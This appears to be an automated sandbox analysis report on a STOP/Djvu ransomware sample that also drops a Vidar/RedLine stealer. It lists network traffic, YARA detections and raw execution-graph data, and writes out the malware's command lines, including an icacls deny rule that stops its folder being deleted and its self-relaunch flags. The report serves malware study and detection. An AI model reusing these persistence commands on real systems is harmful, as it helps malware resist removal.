                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vXz6wPnNTz2u8xVUP5vvjA6ax8Z6wQ4pwPEOQddH4k91g54COS36tVXeSESxekLXM58hfA%2FcXWSB6gchHw5GmZckOVL6f%2BdbW0KcYPa5qCNL0tncyrAmJv%2FNg329"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431bf52bde57d0-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:48:13 UTC | 433 | IN | Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:48:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                      5 | 192.168.2.4 | 49762 | 172.67.139.220 | 443 | 7256 | C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                      2024-01-12 05:48:21 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:48:21 UTC | 893 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:21 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=liX%2Ba2MpRuoDX%2BWGCUi1CaZmZlGoAchQrY51jVm3XjGlVQQzaiogarTBBbHZM%2BxvD8Tkcu%2FdtAWVAGr%2BVDntyi2nd2gpTWwhaQv0CGwWePWHfJcwA7XKFxmE5d51"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431c28ab1f2427-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
2024-01-12 05:48:21 UTC | 433 | IN | Data Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                      Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-12 05:48:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0



                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:06:47:53
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1645947470.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:06:47:55
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:06:47:55
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe --Task
                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: unknown
                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: ditekSHen
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 86%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:06:47:55
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1666987231.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:06:48:03
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:367'104 bytes
                                                                                                                                                                      MD5 hash:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1746887705.0000000000633000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 79%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:06:48:03
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:367'104 bytes
                                                                                                                                                                      MD5 hash:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:06:48:08
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1841882825.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1797319331.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:06:48:19
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.1921120348.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000000.1910328345.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:2.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:36.2%
                                                                                                                                                                        Total number of Nodes:836
                                                                                                                                                                        Total number of Limit Nodes:84
39097->39098 39099 b9b140 60 API calls 39098->39099 39098->39137 39100 b9d5ae 39099->39100 39101 b9b1d0 SysFreeString 39100->39101 39102 b9d5d6 39101->39102 39103 b9b140 60 API calls 39102->39103 39102->39137 39104 b9d679 39103->39104 39105 b9b1d0 SysFreeString 39104->39105 39106 b9d6a1 39105->39106 39107 b9b140 60 API calls 39106->39107 39106->39137 39108 b9d6b6 39107->39108 39109 b9b1d0 SysFreeString 39108->39109 39110 b9d6de 39109->39110 39111 b9b140 60 API calls 39110->39111 39110->39137 39112 b9d707 39111->39112 39113 b9b1d0 SysFreeString 39112->39113 39114 b9d72f 39113->39114 39115 b9b140 60 API calls 39114->39115 39114->39137 39116 b9d744 39115->39116 39117 b9b1d0 SysFreeString 39116->39117 39118 b9d76c 39117->39118 39118->39137 39326 bb3aaf GetSystemTimeAsFileTime 39118->39326 39120 b9d77d 39328 bb3551 39120->39328 39125 ba2c40 59 API calls 39126 b9d7b5 39125->39126 39127 ba2900 60 API calls 39126->39127 39128 b9d7c3 39127->39128 39129 b9b140 60 API calls 39128->39129 39130 b9d7db 39129->39130 39131 b9b1d0 SysFreeString 39130->39131 39132 b9d7ff 39131->39132 39133 b9b140 60 API calls 39132->39133 39132->39137 39134 b9d8a3 39133->39134 39135 b9b1d0 SysFreeString 39134->39135 39136 b9d8cb 39135->39136 39136->39137 39138 b9b140 60 API calls 39136->39138 39137->39074 39139 b9d8ea 39138->39139 39140 b9b1d0 SysFreeString 39139->39140 39141 b9d912 39140->39141 39141->39137 39336 b9b400 SysAllocString 39141->39336 39143 b9d936 VariantInit VariantInit 39144 b9b140 60 API calls 39143->39144 39145 b9d985 39144->39145 39146 b9b1d0 SysFreeString 39145->39146 39147 b9d9e7 VariantClear VariantClear VariantClear 39146->39147 39148 b9da10 39147->39148 39149 b9da46 CoUninitialize 39147->39149 39340 bb052a 78 API calls __snprintf_l 39148->39340 39149->39076 39152->38630 39153->38673 39154->38674 39155->38711 39156->38715 39158 ba5c1e 39157->39158 39159 ba5c66 39157->39159 39158->39159 39168 ba5c45 39158->39168 39160 ba5cff 39159->39160 39161 ba5c76 39159->39161 39497 bdf23e 
59 API calls 2 library calls 39160->39497 39165 ba5c88 ___check_float_string 39161->39165 39496 ba6950 59 API calls 2 library calls 39161->39496 39165->38719 39170 ba4690 59 API calls 39168->39170 39171 ba5c60 39170->39171 39171->38719 39172->38722 39173->38724 39174->38730 39175->38740 39177 ba3a90 59 API calls 39176->39177 39178 ba294c MultiByteToWideChar 39177->39178 39179 ba8400 59 API calls 39178->39179 39180 ba298d 39179->39180 39180->38743 39181->38748 39182->38756 39183->38762 39184->38766 39185->38770 39186->38774 39187->38778 39188->38782 39189->38786 39190->38788 39191->38790 39192->38792 39193->38794 39194->38796 39195->38798 39196->38800 39197->38802 39198->38804 39199->38806 39200->38808 39201->38810 39202->38812 39203->38814 39204->38816 39205->38818 39207 ba2c5f 39206->39207 39208 ba2c71 39206->39208 39209 ba56d0 59 API calls 39207->39209 39211 ba56d0 59 API calls 39208->39211 39210 ba2c6a 39209->39210 39210->38823 39212 ba2c8a 39211->39212 39212->38823 39213->38825 39214->38848 39215->38848 39216->38848 39217->38829 39218->38831 39219->38834 39220->38837 39221->38840 39222->38842 39223->38845 39224->38850 39225->38852 39226->38876 39227->38876 39228->38876 39229->38876 39230->38876 39231->38876 39498 baf130 218 API calls _LanguageEnumProc@4 39231->39498 39232->38856 39499 bafd80 64 API calls 39232->39499 39236 ba5735 39235->39236 39241 ba56de 39235->39241 39237 ba573e 39236->39237 39238 ba57bc 39236->39238 39244 ba5750 ___check_float_string 39237->39244 39258 ba6760 59 API calls 2 library calls 39237->39258 39259 bdf23e 59 API calls 2 library calls 39238->39259 39241->39236 39246 ba5704 39241->39246 39244->38935 39248 ba5709 39246->39248 39249 ba571f 39246->39249 39256 ba3ff0 59 API calls ___check_float_string 39248->39256 39257 ba3ff0 59 API calls ___check_float_string 39249->39257 39252 ba5719 39252->38935 39253 ba572f 39253->38935 39254->38939 39255->38941 39256->39252 39257->39253 39258->39244 39261 bb3b4c 59 API calls 39260->39261 39262 baccca 
39261->39262 39265 baa00a 39262->39265 39266 bdf1bb 59 API calls 3 library calls 39262->39266 39265->38633 39265->38634 39267->38948 39270->38965 39271->38965 39275 bc1570 39272->39275 39278 bc1580 39275->39278 39276 bc1586 39286 bb5208 58 API calls __getptd_noexit 39276->39286 39278->39276 39282 bc15ae 39278->39282 39279 bc158b 39287 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39279->39287 39285 bc15cf wcstoxq 39282->39285 39288 bbe883 GetStringTypeW 39282->39288 39284 baa36e lstrcpyW lstrcpyW 39284->38667 39285->39284 39289 bb5208 58 API calls __getptd_noexit 39285->39289 39286->39279 39287->39284 39288->39282 39289->39284 39291 ba1cf2 RegOpenKeyExW 39290->39291 39291->38972 39291->38997 39292->38981 39293->39000 39295 bb0241 39294->39295 39296 bb02b6 39294->39296 39303 bb0266 39295->39303 39304 bb5208 58 API calls __getptd_noexit 39295->39304 39306 bb02c8 60 API calls 3 library calls 39296->39306 39299 bb02c3 39299->39019 39300 bb024d 39305 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39300->39305 39302 bb0258 39302->39019 39303->39019 39304->39300 39305->39302 39306->39299 39307->39045 39308->39046 39309->39039 39312->39065 39313->39068 39314->39053 39315->39055 39318 bb3b4c 59 API calls 39317->39318 39319 b9b164 39318->39319 39320 b9b177 SysAllocString 39319->39320 39321 b9b194 39319->39321 39320->39321 39321->39082 39323 b9b1de 39322->39323 39325 b9b202 39322->39325 39324 b9b1f5 SysFreeString 39323->39324 39323->39325 39324->39325 39325->39084 39327 bb3add __aulldiv 39326->39327 39327->39120 39341 bc035d 39328->39341 39330 bb355a 39332 b9d78f 39330->39332 39349 bb3576 39330->39349 39333 bb28e0 39332->39333 39451 bb279f 39333->39451 39337 b9b41d 39336->39337 39338 b9b423 39336->39338 39337->39143 39339 b9b42d VariantClear 39338->39339 39339->39143 39340->39137 39382 bb501f 58 API calls 4 library calls 39341->39382 39343 bc0363 39344 bc0369 39343->39344 39346 bc038d 39343->39346 39347 bb8cde __malloc_crt 58 API calls 39343->39347 
39344->39346 39383 bb5208 58 API calls __getptd_noexit 39344->39383 39346->39330 39347->39344 39348 bc036e 39348->39330 39350 bb35a9 _memset 39349->39350 39351 bb3591 39349->39351 39350->39351 39359 bb35c0 39350->39359 39392 bb5208 58 API calls __getptd_noexit 39351->39392 39353 bb3596 39393 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39353->39393 39355 bb35cb 39394 bb5208 58 API calls __getptd_noexit 39355->39394 39356 bb35e9 39384 bbfb64 39356->39384 39359->39355 39359->39356 39360 bb35ee 39395 bbf803 58 API calls __fclose_nolock 39360->39395 39362 bb35f7 39363 bb37e5 39362->39363 39396 bbf82d 58 API calls __fclose_nolock 39362->39396 39409 bb42fd 8 API calls 2 library calls 39363->39409 39366 bb37ef 39367 bb3609 39367->39363 39397 bbf857 39367->39397 39369 bb361b 39369->39363 39370 bb3624 39369->39370 39371 bb369b 39370->39371 39373 bb3637 39370->39373 39407 bbf939 58 API calls 4 library calls 39371->39407 39404 bbf939 58 API calls 4 library calls 39373->39404 39374 bb36a2 39381 bb35a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39374->39381 39408 bbfbb4 58 API calls 4 library calls 39374->39408 39376 bb364f 39376->39381 39405 bbfbb4 58 API calls 4 library calls 39376->39405 39379 bb3668 39379->39381 39406 bbf939 58 API calls 4 library calls 39379->39406 39381->39332 39382->39343 39383->39348 39385 bbfb70 _fgetws 39384->39385 39386 bbfba5 _fgetws 39385->39386 39387 bb8af7 __lock 58 API calls 39385->39387 39386->39360 39388 bbfb80 39387->39388 39391 bbfb93 39388->39391 39410 bbfe47 39388->39410 39439 bbfbab LeaveCriticalSection _doexit 39391->39439 39392->39353 39393->39381 39394->39381 39395->39362 39396->39367 39398 bbf861 39397->39398 39399 bbf876 39397->39399 39449 bb5208 58 API calls __getptd_noexit 39398->39449 39399->39369 39401 bbf866 39450 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39401->39450 39403 bbf871 39403->39369 39404->39376 39405->39379 39406->39381 39407->39374 39408->39381 39409->39366 39411 bbfe53 _fgetws 
